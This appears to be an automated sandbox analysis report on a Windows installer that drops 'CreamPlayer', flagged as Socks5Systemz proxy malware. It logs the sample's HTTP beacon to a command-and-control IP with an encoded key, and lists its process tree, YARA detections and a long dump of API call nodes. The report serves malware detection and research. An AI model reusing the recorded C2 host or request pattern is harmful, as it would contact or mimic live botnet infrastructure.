Destination IP: 188.119.66.185
Destination Port: 443
PID: 7420
Process: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
2024-12-14 13:09:37 UTC, 291 bytes, OUT:
GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-14 13:09:38 UTC, 200 bytes, IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 14 Dec 2024 13:09:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-14 13:09:38 UTC, 24 bytes, IN:
Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


                                                                                                  Target ID:0
                                                                                                  Start time:08:07:31
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Users\user\Desktop\bzX2pV3Ybw.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:4'096'896 bytes
                                                                                                  MD5 hash:CD6081E11EB60ABFA77C3B587726D83F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:2
                                                                                                  Start time:08:07:31
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp" /SL5="$103F2,3847834,56832,C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:706'560 bytes
                                                                                                  MD5 hash:726BF37850FF846984004440C4875481
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000002.2615859333.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:3
                                                                                                  Start time:08:07:32
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\system32\net.exe" pause cream_player_12135
                                                                                                  Imagebase:0x470000
                                                                                                  File size:47'104 bytes
                                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:08:07:33
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff70f010000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:08:07:33
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe" -i
                                                                                                  Imagebase:0x400000
                                                                                                  File size:4'668'655 bytes
                                                                                                  MD5 hash:A3E56DEA396FF196EFE4C3E60B998E88
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.2616261521.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1369381246.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:6
                                                                                                  Start time:08:07:33
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\net1 pause cream_player_12135
                                                                                                  Imagebase:0x9f0000
                                                                                                  File size:139'776 bytes
                                                                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true


                                                                                                    Execution Graph

                                                                                                    Execution Coverage:21.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:2.4%
                                                                                                    Total number of Nodes:1520
                                                                                                    Total number of Limit Nodes:22
409590 6040 40959d GetUserDefaultLangID 6038->6040 6045 409592 6038->6045 6039 409594 6049 407024 GetModuleHandleA GetProcAddress 6039->6049 6040->6045 6043 40956f 6043->5967 6044->6038 6044->6039 6044->6043 6045->6043 6046 4095cb GetACP 6045->6046 6047 4095ef 6045->6047 6046->6043 6046->6045 6047->6043 6048 409615 GetACP 6047->6048 6048->6043 6048->6047 6050 407067 6049->6050 6051 40705e 6049->6051 6052 407070 6050->6052 6053 4070a8 6050->6053 6060 403198 4 API calls 6051->6060 6070 406f68 6052->6070 6054 406f68 RegOpenKeyExA 6053->6054 6058 4070c1 6054->6058 6056 407089 6057 4070de 6056->6057 6073 406f5c 6056->6073 6062 40322c 4 API calls 6057->6062 6058->6057 6061 406f5c 20 API calls 6058->6061 6064 407120 6060->6064 6065 4070d5 RegCloseKey 6061->6065 6066 4070eb 6062->6066 6067 403198 4 API calls 6064->6067 6065->6057 6068 4032fc 18 API calls 6066->6068 6069 407128 6067->6069 6068->6051 6069->6045 6071 406f73 6070->6071 6072 406f79 RegOpenKeyExA 6070->6072 6071->6072 6072->6056 6076 406e10 6073->6076 6077 406e36 RegQueryValueExA 6076->6077 6078 406e59 6077->6078 6083 406e7b 6077->6083 6079 406e73 6078->6079 6078->6083 6084 403278 18 API calls 6078->6084 6085 403420 18 API calls 6078->6085 6081 403198 4 API calls 6079->6081 6080 403198 4 API calls 6082 406f47 RegCloseKey 6080->6082 6081->6083 6082->6057 6083->6080 6084->6078 6086 406eb0 RegQueryValueExA 6085->6086 6086->6077 6087 406ecc 6086->6087 6087->6083 6088 4034f0 18 API calls 6087->6088 6089 406f0e 6088->6089 6090 406f20 6089->6090 6092 403420 18 API calls 6089->6092 6091 4031e8 18 API calls 6090->6091 6091->6083 6092->6090 6135 406a58 6093->6135 6097 406a58 19 API calls 6099 406d36 6097->6099 6098 406d26 6098->6097 6100 406d72 6098->6100 6101 406d42 6099->6101 6103 406a34 21 API calls 6099->6103 6143 406888 6100->6143 6101->6100 6104 406d67 6101->6104 6107 406a58 19 API calls 6101->6107 6103->6101 6104->6100 6155 406cc8 GetWindowsDirectoryA 6104->6155 6108 406d5b 6107->6108 6108->6104 6111 406a34 21 API 
calls 6108->6111 6109 406638 19 API calls 6110 406d87 6109->6110 6112 40322c 4 API calls 6110->6112 6111->6104 6113 406d91 6112->6113 6114 4031b8 4 API calls 6113->6114 6115 406dab 6114->6115 6115->5977 6117 409244 6116->6117 6118 406638 19 API calls 6117->6118 6119 40925d 6118->6119 6120 40322c 4 API calls 6119->6120 6127 409268 6120->6127 6121 406978 20 API calls 6121->6127 6123 408dd8 18 API calls 6123->6127 6124 4033b4 18 API calls 6124->6127 6125 405890 18 API calls 6125->6127 6127->6121 6127->6123 6127->6124 6127->6125 6128 4092e4 6127->6128 6195 4091b0 6127->6195 6203 409034 6127->6203 6129 40322c 4 API calls 6128->6129 6130 4092ef 6129->6130 6131 4031b8 4 API calls 6130->6131 6132 409309 6131->6132 6133 403198 4 API calls 6132->6133 6134 409311 6133->6134 6134->5977 6136 4034f0 18 API calls 6135->6136 6137 406a6b 6136->6137 6138 406a82 GetEnvironmentVariableA 6137->6138 6142 406a95 6137->6142 6157 406dec 6137->6157 6138->6137 6139 406a8e 6138->6139 6141 403198 4 API calls 6139->6141 6141->6142 6142->6098 6152 406a34 6142->6152 6144 403414 6143->6144 6145 4068ab GetFullPathNameA 6144->6145 6146 4068b7 6145->6146 6147 4068ce 6145->6147 6146->6147 6149 4068bf 6146->6149 6148 40322c 4 API calls 6147->6148 6150 4068cc 6148->6150 6151 403278 18 API calls 6149->6151 6150->6109 6151->6150 6161 4069dc 6152->6161 6156 406ce9 6155->6156 6156->6100 6158 406dfa 6157->6158 6159 4034f0 18 API calls 6158->6159 6160 406e08 6159->6160 6160->6137 6168 406978 6161->6168 6163 4069fe 6164 406a06 GetFileAttributesA 6163->6164 6165 406a1b 6164->6165 6166 403198 4 API calls 6165->6166 6167 406a23 6166->6167 6167->6098 6178 406744 6168->6178 6170 4069b0 6173 4069c6 6170->6173 6174 4069bb 6170->6174 6172 406989 6172->6170 6185 406970 CharPrevA 6172->6185 6186 403454 6173->6186 6175 40322c 4 API calls 6174->6175 6177 4069c4 6175->6177 6177->6163 6181 406755 6178->6181 6179 4067b9 6180 406680 IsDBCSLeadByte 6179->6180 6182 4067b4 6179->6182 6180->6182 6181->6179 6184 406773 6181->6184 
6182->6172 6184->6182 6193 406680 IsDBCSLeadByte 6184->6193 6185->6172 6187 403486 6186->6187 6188 403459 6186->6188 6189 403198 4 API calls 6187->6189 6188->6187 6191 40346d 6188->6191 6190 40347c 6189->6190 6190->6177 6192 403278 18 API calls 6191->6192 6192->6190 6194 406694 6193->6194 6194->6184 6196 403198 4 API calls 6195->6196 6198 4091d1 6196->6198 6200 4091fe 6198->6200 6212 4032a8 6198->6212 6215 403494 6198->6215 6201 403198 4 API calls 6200->6201 6202 409213 6201->6202 6202->6127 6204 408f70 2 API calls 6203->6204 6205 40904a 6204->6205 6206 40904e 6205->6206 6219 406a48 6205->6219 6206->6127 6209 409081 6210 408fac Wow64RevertWow64FsRedirection 6209->6210 6211 409089 6210->6211 6211->6127 6213 403278 18 API calls 6212->6213 6214 4032b5 6213->6214 6214->6198 6216 403498 6215->6216 6218 4034c3 6215->6218 6217 4034f0 18 API calls 6216->6217 6217->6218 6218->6198 6220 4069dc 21 API calls 6219->6220 6221 406a52 GetLastError 6220->6221 6221->6209 6223 406744 IsDBCSLeadByte 6222->6223 6225 406835 6223->6225 6224 40687f 6224->5991 6225->6224 6226 406680 IsDBCSLeadByte 6225->6226 6226->6225 6228 4068f3 6227->6228 6229 406820 IsDBCSLeadByte 6228->6229 6231 4068fe 6229->6231 6230 4066ea 6230->5996 6230->5997 6231->6230 6232 406680 IsDBCSLeadByte 6231->6232 6232->6231 6234 406957 6233->6234 6235 40695b 6233->6235 6234->6010 6238 406970 CharPrevA 6235->6238 6237 40696c 6237->6010 6238->6237 6813 408f30 6816 408dfc 6813->6816 6817 408e05 6816->6817 6818 403198 4 API calls 6817->6818 6819 408e13 6817->6819 6818->6817 6820 403932 6821 403924 6820->6821 6822 40374c VariantClear 6821->6822 6823 40392c 6822->6823 5383 4075c4 SetFilePointer 5384 4075f7 5383->5384 5385 4075e7 GetLastError 5383->5385 5385->5384 5386 4075f0 5385->5386 5388 40748c GetLastError 5386->5388 5391 4073ec 5388->5391 5392 407284 19 API calls 5391->5392 5393 407414 5392->5393 5394 407434 5393->5394 5395 405194 33 API calls 5393->5395 5396 405890 18 API calls 5394->5396 5395->5394 5397 407443 
5396->5397 5398 403198 4 API calls 5397->5398 5399 407460 5398->5399 5399->5384 6414 4076c8 WriteFile 6415 4076e8 6414->6415 6416 4076ef 6414->6416 6417 40748c 35 API calls 6415->6417 6418 407700 6416->6418 6419 4073ec 34 API calls 6416->6419 6417->6416 6419->6418 6420 402ccc 6423 402cfe 6420->6423 6424 402cdd 6420->6424 6421 402d88 RtlUnwind 6422 403154 4 API calls 6421->6422 6422->6423 6424->6421 6424->6423 6425 402b28 RaiseException 6424->6425 6426 402d7f 6425->6426 6426->6421 6832 403fcd 6833 403f07 4 API calls 6832->6833 6834 403fd6 6833->6834 6835 403e9c 4 API calls 6834->6835 6836 403fe2 6835->6836 6433 4024d0 6434 4024e4 6433->6434 6435 4024e9 6433->6435 6438 401918 4 API calls 6434->6438 6436 402518 6435->6436 6437 40250e RtlEnterCriticalSection 6435->6437 6440 4024ed 6435->6440 6448 402300 6436->6448 6437->6436 6438->6435 6441 402525 6444 402581 6441->6444 6445 402577 RtlLeaveCriticalSection 6441->6445 6443 401fd4 14 API calls 6446 402531 6443->6446 6445->6444 6446->6441 6447 40215c 9 API calls 6446->6447 6447->6441 6449 402314 6448->6449 6451 402335 6449->6451 6452 4023b8 6449->6452 6450 402344 6450->6441 6450->6443 6451->6450 6454 401b74 9 API calls 6451->6454 6452->6450 6453 401d80 9 API calls 6452->6453 6456 402455 6452->6456 6458 401e84 6452->6458 6453->6452 6454->6450 6456->6450 6457 401d00 9 API calls 6456->6457 6457->6450 6463 401768 6458->6463 6460 401e99 6461 401ea6 6460->6461 6462 401dcc 9 API calls 6460->6462 6461->6452 6462->6461 6464 401787 6463->6464 6465 40183b 6464->6465 6466 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6464->6466 6467 40132c LocalAlloc 6464->6467 6469 401821 6464->6469 6471 4017d6 6464->6471 6468 4015c4 VirtualAlloc 6465->6468 6472 4017e7 6465->6472 6466->6464 6467->6464 6468->6472 6470 40150c VirtualFree 6469->6470 6470->6472 6473 40150c VirtualFree 6471->6473 6472->6460 6473->6472 6474 4028d2 6475 4028da 6474->6475 6476 403554 4 API calls 6475->6476 6477 4028ef 6475->6477 6476->6475 6478 4025ac 4 API calls 
6477->6478 6479 4028f4 6478->6479 6837 4019d3 6838 4019ba 6837->6838 6839 4019c3 RtlLeaveCriticalSection 6838->6839 6840 4019cd 6838->6840 6839->6840 5400 407fd4 5401 407fe6 5400->5401 5403 407fed 5400->5403 5411 407f10 5401->5411 5405 408015 5403->5405 5406 408017 5403->5406 5409 408021 5403->5409 5404 40804e 5425 407e2c 5405->5425 5422 407d7c 5406->5422 5408 407d7c 33 API calls 5408->5404 5409->5404 5409->5408 5412 407f25 5411->5412 5413 407d7c 33 API calls 5412->5413 5414 407f34 5412->5414 5413->5414 5415 407f6e 5414->5415 5416 407d7c 33 API calls 5414->5416 5417 407f82 5415->5417 5418 407d7c 33 API calls 5415->5418 5416->5415 5421 407fae 5417->5421 5432 407eb8 5417->5432 5418->5417 5421->5403 5435 4058c4 5422->5435 5424 407d9e 5424->5409 5426 405194 33 API calls 5425->5426 5427 407e57 5426->5427 5443 407de4 5427->5443 5429 407e5f 5430 403198 4 API calls 5429->5430 5431 407e74 5430->5431 5431->5409 5433 407ec7 VirtualFree 5432->5433 5434 407ed9 VirtualAlloc 5432->5434 5433->5434 5434->5421 5437 4058d0 5435->5437 5436 405194 33 API calls 5438 4058fd 5436->5438 5437->5436 5439 4031e8 18 API calls 5438->5439 5440 405908 5439->5440 5441 403198 4 API calls 5440->5441 5442 40591d 5441->5442 5442->5424 5444 4058c4 33 API calls 5443->5444 5445 407e06 5444->5445 5445->5429 6480 405ad4 6481 405ae4 6480->6481 6482 405adc 6480->6482 6483 405ae2 6482->6483 6484 405aeb 6482->6484 6487 405a4c 6483->6487 6485 405940 19 API calls 6484->6485 6485->6481 6488 405a54 6487->6488 6489 405a6e 6488->6489 6492 403154 4 API calls 6488->6492 6490 405a73 6489->6490 6491 405a8a 6489->6491 6493 405940 19 API calls 6490->6493 6494 403154 4 API calls 6491->6494 6492->6488 6495 405a86 6493->6495 6496 405a8f 6494->6496 6498 403154 4 API calls 6495->6498 6497 4059b0 33 API calls 6496->6497 6497->6495 6499 405ab8 6498->6499 6500 403154 4 API calls 6499->6500 6501 405ac6 6500->6501 6501->6481 5913 40a9de 5914 40aa03 5913->5914 5915 407918 InterlockedExchange 5914->5915 5916 40aa2d 5915->5916 5917 
40aa3d 5916->5917 5918 409ae8 18 API calls 5916->5918 5923 4076ac SetEndOfFile 5917->5923 5918->5917 5920 40aa59 5921 4025ac 4 API calls 5920->5921 5922 40aa90 5921->5922 5924 4076c3 5923->5924 5925 4076bc 5923->5925 5924->5920 5926 40748c 35 API calls 5925->5926 5926->5924 6844 402be9 RaiseException 6845 402c04 6844->6845 6512 402af2 6513 402afe 6512->6513 6516 402ed0 6513->6516 6517 403154 4 API calls 6516->6517 6519 402ee0 6517->6519 6518 402b03 6519->6518 6521 402b0c 6519->6521 6522 402b25 6521->6522 6523 402b15 RaiseException 6521->6523 6522->6518 6523->6522 5451 40a5f8 5494 4030dc 5451->5494 5453 40a60e 5497 4042e8 5453->5497 5455 40a613 5500 40457c GetModuleHandleA GetProcAddress 5455->5500 5459 40a61d 5508 4065c8 5459->5508 5461 40a622 5517 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5461->5517 5470 40a665 5539 406c2c 5470->5539 5472 4031e8 18 API calls 5473 40a683 5472->5473 5553 4074e0 5473->5553 5479 407918 InterlockedExchange 5481 40a6d2 5479->5481 5480 40a710 5573 4074a0 5480->5573 5481->5480 5610 409ae8 5481->5610 5483 40a751 5577 407a28 5483->5577 5484 40a736 5484->5483 5486 409ae8 18 API calls 5484->5486 5486->5483 5487 40a776 5587 408b08 5487->5587 5491 40a7bc 5492 408b08 35 API calls 5491->5492 5493 40a7f5 5491->5493 5492->5491 5620 403094 5494->5620 5496 4030e1 GetModuleHandleA GetCommandLineA 5496->5453 5498 403154 4 API calls 5497->5498 5499 404323 5497->5499 5498->5499 5499->5455 5501 404598 5500->5501 5502 40459f GetProcAddress 5500->5502 5501->5502 5503 4045b5 GetProcAddress 5502->5503 5504 4045ae 5502->5504 5505 4045c4 SetProcessDEPPolicy 5503->5505 5506 4045c8 5503->5506 5504->5503 5505->5506 5507 404624 6FB81CD0 5506->5507 5507->5459 5621 405ca8 5508->5621 5518 4090f7 5517->5518 5705 406fa0 SetErrorMode 5518->5705 5521 407284 19 API calls 5522 409127 5521->5522 5523 403198 4 API calls 5522->5523 5524 40913c 5523->5524 5525 409b78 GetSystemInfo VirtualQuery 5524->5525 5526 409ba2 5525->5526 5527 409c2c 5525->5527 
5526->5527 5528 409c0d VirtualQuery 5526->5528 5529 409bcc VirtualProtect 5526->5529 5530 409bfb VirtualProtect 5526->5530 5531 409768 5527->5531 5528->5526 5528->5527 5529->5526 5530->5528 5711 406bd0 GetCommandLineA 5531->5711 5533 409850 5534 4031b8 4 API calls 5533->5534 5536 40986a 5534->5536 5535 406c2c 20 API calls 5538 409785 5535->5538 5536->5470 5603 409c88 5536->5603 5537 403454 18 API calls 5537->5538 5538->5533 5538->5535 5538->5537 5540 406c53 GetModuleFileNameA 5539->5540 5541 406c77 GetCommandLineA 5539->5541 5542 403278 18 API calls 5540->5542 5549 406c7c 5541->5549 5543 406c75 5542->5543 5547 406ca4 5543->5547 5544 406c81 5545 403198 4 API calls 5544->5545 5548 406c89 5545->5548 5546 406af0 18 API calls 5546->5549 5550 403198 4 API calls 5547->5550 5551 40322c 4 API calls 5548->5551 5549->5544 5549->5546 5549->5548 5552 406cb9 5550->5552 5551->5547 5552->5472 5554 4074ea 5553->5554 5718 407576 5554->5718 5721 407578 5554->5721 5555 407516 5556 40752a 5555->5556 5557 40748c 35 API calls 5555->5557 5560 409c34 FindResourceA 5556->5560 5557->5556 5561 409c49 5560->5561 5562 409c4e SizeofResource 5560->5562 5563 409ae8 18 API calls 5561->5563 5564 409c60 LoadResource 5562->5564 5565 409c5b 5562->5565 5563->5562 5567 409c73 LockResource 5564->5567 5568 409c6e 5564->5568 5566 409ae8 18 API calls 5565->5566 5566->5564 5570 409c84 5567->5570 5571 409c7f 5567->5571 5569 409ae8 18 API calls 5568->5569 5569->5567 5570->5479 5570->5481 5572 409ae8 18 API calls 5571->5572 5572->5570 5574 4074b4 5573->5574 5575 4074c4 5574->5575 5576 4073ec 34 API calls 5574->5576 5575->5484 5576->5575 5578 407a35 5577->5578 5579 405890 18 API calls 5578->5579 5580 407a89 5578->5580 5579->5580 5581 407918 InterlockedExchange 5580->5581 5582 407a9b 5581->5582 5583 405890 18 API calls 5582->5583 5584 407ab1 5582->5584 5583->5584 5585 405890 18 API calls 5584->5585 5586 407af4 5584->5586 5585->5586 5586->5487 5591 408b82 5587->5591 5598 408b39 5587->5598 5588 408bcd 5724 407cb8 
5588->5724 5590 408be4 5594 4031b8 4 API calls 5590->5594 5591->5588 5593 4034f0 18 API calls 5591->5593 5599 4031e8 18 API calls 5591->5599 5600 403420 18 API calls 5591->5600 5602 407cb8 35 API calls 5591->5602 5592 4034f0 18 API calls 5592->5598 5593->5591 5597 408bfe 5594->5597 5595 403420 18 API calls 5595->5598 5596 4031e8 18 API calls 5596->5598 5617 404c20 5597->5617 5598->5591 5598->5592 5598->5595 5598->5596 5601 407cb8 35 API calls 5598->5601 5599->5591 5600->5591 5601->5598 5602->5591 5604 40322c 4 API calls 5603->5604 5605 409cab 5604->5605 5606 409cba MessageBoxA 5605->5606 5607 409ccf 5606->5607 5608 403198 4 API calls 5607->5608 5609 409cd7 5608->5609 5609->5470 5611 409af1 5610->5611 5612 409b09 5610->5612 5613 405890 18 API calls 5611->5613 5614 405890 18 API calls 5612->5614 5616 409b03 5613->5616 5615 409b1a 5614->5615 5615->5480 5616->5480 5746 402594 5617->5746 5619 404c2b 5619->5491 5620->5496 5622 405940 19 API calls 5621->5622 5623 405cb9 5622->5623 5624 405280 GetSystemDefaultLCID 5623->5624 5628 4052b6 5624->5628 5625 404cdc 19 API calls 5625->5628 5626 40520c 19 API calls 5626->5628 5627 4031e8 18 API calls 5627->5628 5628->5625 5628->5626 5628->5627 5632 405318 5628->5632 5629 40520c 19 API calls 5629->5632 5630 4031e8 18 API calls 5630->5632 5631 404cdc 19 API calls 5631->5632 5632->5629 5632->5630 5632->5631 5633 40539b 5632->5633 5634 4031b8 4 API calls 5633->5634 5635 4053b5 5634->5635 5636 4053c4 GetSystemDefaultLCID 5635->5636 5693 40520c GetLocaleInfoA 5636->5693 5639 4031e8 18 API calls 5640 405404 5639->5640 5641 40520c 19 API calls 5640->5641 5642 405419 5641->5642 5643 40520c 19 API calls 5642->5643 5644 40543d 5643->5644 5699 405258 GetLocaleInfoA 5644->5699 5647 405258 GetLocaleInfoA 5648 40546d 5647->5648 5649 40520c 19 API calls 5648->5649 5650 405487 5649->5650 5651 405258 GetLocaleInfoA 5650->5651 5652 4054a4 5651->5652 5653 40520c 19 API calls 5652->5653 5654 4054be 5653->5654 5655 4031e8 18 API calls 5654->5655 5656 
4054cb 5655->5656 5657 40520c 19 API calls 5656->5657 5658 4054e0 5657->5658 5659 4031e8 18 API calls 5658->5659 5660 4054ed 5659->5660 5661 405258 GetLocaleInfoA 5660->5661 5662 4054fb 5661->5662 5663 40520c 19 API calls 5662->5663 5664 405515 5663->5664 5665 4031e8 18 API calls 5664->5665 5666 405522 5665->5666 5667 40520c 19 API calls 5666->5667 5668 405537 5667->5668 5669 4031e8 18 API calls 5668->5669 5670 405544 5669->5670 5671 40520c 19 API calls 5670->5671 5672 405559 5671->5672 5673 405576 5672->5673 5674 405567 5672->5674 5676 40322c 4 API calls 5673->5676 5701 40322c 5674->5701 5677 405574 5676->5677 5678 40520c 19 API calls 5677->5678 5679 405598 5678->5679 5680 4055b5 5679->5680 5681 4055a6 5679->5681 5683 403198 4 API calls 5680->5683 5682 40322c 4 API calls 5681->5682 5684 4055b3 5682->5684 5683->5684 5685 4033b4 18 API calls 5684->5685 5686 4055d7 5685->5686 5687 4033b4 18 API calls 5686->5687 5688 4055f1 5687->5688 5689 4031b8 4 API calls 5688->5689 5690 40560b 5689->5690 5691 405cf4 GetVersionExA 5690->5691 5692 405d0b 5691->5692 5692->5461 5694 405233 5693->5694 5695 405245 5693->5695 5696 403278 18 API calls 5694->5696 5697 40322c 4 API calls 5695->5697 5698 405243 5696->5698 5697->5698 5698->5639 5700 405274 5699->5700 5700->5647 5703 403230 5701->5703 5702 403252 5702->5677 5703->5702 5704 4025ac 4 API calls 5703->5704 5704->5702 5709 403414 5705->5709 5708 406fee 5708->5521 5710 403418 LoadLibraryA 5709->5710 5710->5708 5712 406af0 18 API calls 5711->5712 5713 406bf3 5712->5713 5714 406c05 5713->5714 5715 406af0 18 API calls 5713->5715 5716 403198 4 API calls 5714->5716 5715->5713 5717 406c1a 5716->5717 5717->5538 5719 407578 5718->5719 5720 4075b7 CreateFileA 5719->5720 5720->5555 5722 403414 5721->5722 5723 4075b7 CreateFileA 5722->5723 5723->5555 5725 407cd3 5724->5725 5729 407cc8 5724->5729 5730 407c5c 5725->5730 5728 405890 18 API calls 5728->5729 5729->5590 5731 407c70 5730->5731 5732 407caf 5730->5732 5731->5732 5734 407bac 5731->5734 
5732->5728 5732->5729 5735 407bb7 5734->5735 5736 407bc8 5734->5736 5737 405890 18 API calls 5735->5737 5738 4074a0 34 API calls 5736->5738 5737->5736 5739 407bdc 5738->5739 5740 4074a0 34 API calls 5739->5740 5741 407bfd 5740->5741 5742 407918 InterlockedExchange 5741->5742 5743 407c12 5742->5743 5744 407c28 5743->5744 5745 405890 18 API calls 5743->5745 5744->5731 5745->5744 5747 402598 5746->5747 5749 4025a2 5746->5749 5752 401fd4 5747->5752 5748 40259e 5748->5749 5750 403154 4 API calls 5748->5750 5749->5619 5749->5749 5750->5749 5753 401fe8 5752->5753 5754 401fed 5752->5754 5763 401918 RtlInitializeCriticalSection 5753->5763 5756 402012 RtlEnterCriticalSection 5754->5756 5757 40201c 5754->5757 5762 401ff1 5754->5762 5756->5757 5757->5762 5770 401ee0 5757->5770 5760 402147 5760->5748 5761 40213d RtlLeaveCriticalSection 5761->5760 5762->5748 5764 40193c RtlEnterCriticalSection 5763->5764 5765 401946 5763->5765 5764->5765 5766 401964 LocalAlloc 5765->5766 5767 40197e 5766->5767 5768 4019c3 RtlLeaveCriticalSection 5767->5768 5769 4019cd 5767->5769 5768->5769 5769->5754 5773 401ef0 5770->5773 5771 401f1c 5775 401f40 5771->5775 5781 401d00 5771->5781 5773->5771 5773->5775 5776 401e58 5773->5776 5775->5760 5775->5761 5785 4016d8 5776->5785 5779 401e75 5779->5773 5782 401d4e 5781->5782 5783 401d1e 5781->5783 5782->5783 5854 401c68 5782->5854 5783->5775 5788 4016f4 5785->5788 5787 4016fe 5810 4015c4 5787->5810 5788->5787 5790 40175b 5788->5790 5793 40174f 5788->5793 5802 401430 5788->5802 5814 40132c 5788->5814 5790->5779 5795 401dcc 5790->5795 5792 40170a 5792->5790 5818 40150c 5793->5818 5828 401d80 5795->5828 5798 40132c LocalAlloc 5800 401df0 5798->5800 5799 401df8 5799->5779 5800->5799 5832 401b44 5800->5832 5803 40143f VirtualAlloc 5802->5803 5805 40146c 5803->5805 5806 40148f 5803->5806 5822 4012e4 5805->5822 5806->5788 5809 40147c VirtualFree 5809->5806 5812 40160a 5810->5812 5811 40163a 5811->5792 5812->5811 5813 401626 VirtualAlloc 5812->5813 5813->5811 
5813->5812 5815 401348 5814->5815 5816 4012e4 LocalAlloc 5815->5816 5817 40138f 5816->5817 5817->5788 5821 40153b 5818->5821 5819 401594 5819->5790 5820 401568 VirtualFree 5820->5821 5821->5819 5821->5820 5825 40128c 5822->5825 5826 401298 LocalAlloc 5825->5826 5827 4012aa 5825->5827 5826->5827 5827->5806 5827->5809 5829 401d92 5828->5829 5830 401d89 5828->5830 5829->5798 5830->5829 5837 401b74 5830->5837 5833 401b61 5832->5833 5834 401b52 5832->5834 5833->5799 5835 401d00 9 API calls 5834->5835 5836 401b5f 5835->5836 5836->5799 5840 40215c 5837->5840 5839 401b95 5839->5829 5841 40217a 5840->5841 5842 402175 5840->5842 5844 4021ab RtlEnterCriticalSection 5841->5844 5847 40217e 5841->5847 5852 4021b5 5841->5852 5843 401918 4 API calls 5842->5843 5843->5841 5844->5852 5845 402244 5845->5847 5850 401d80 7 API calls 5845->5850 5846 4021c1 5848 4022e3 RtlLeaveCriticalSection 5846->5848 5849 4022ed 5846->5849 5847->5839 5848->5849 5849->5839 5850->5847 5851 402270 5851->5846 5853 401d00 7 API calls 5851->5853 5852->5845 5852->5846 5852->5851 5853->5846 5855 401c7a 5854->5855 5856 401c9d 5855->5856 5857 401caf 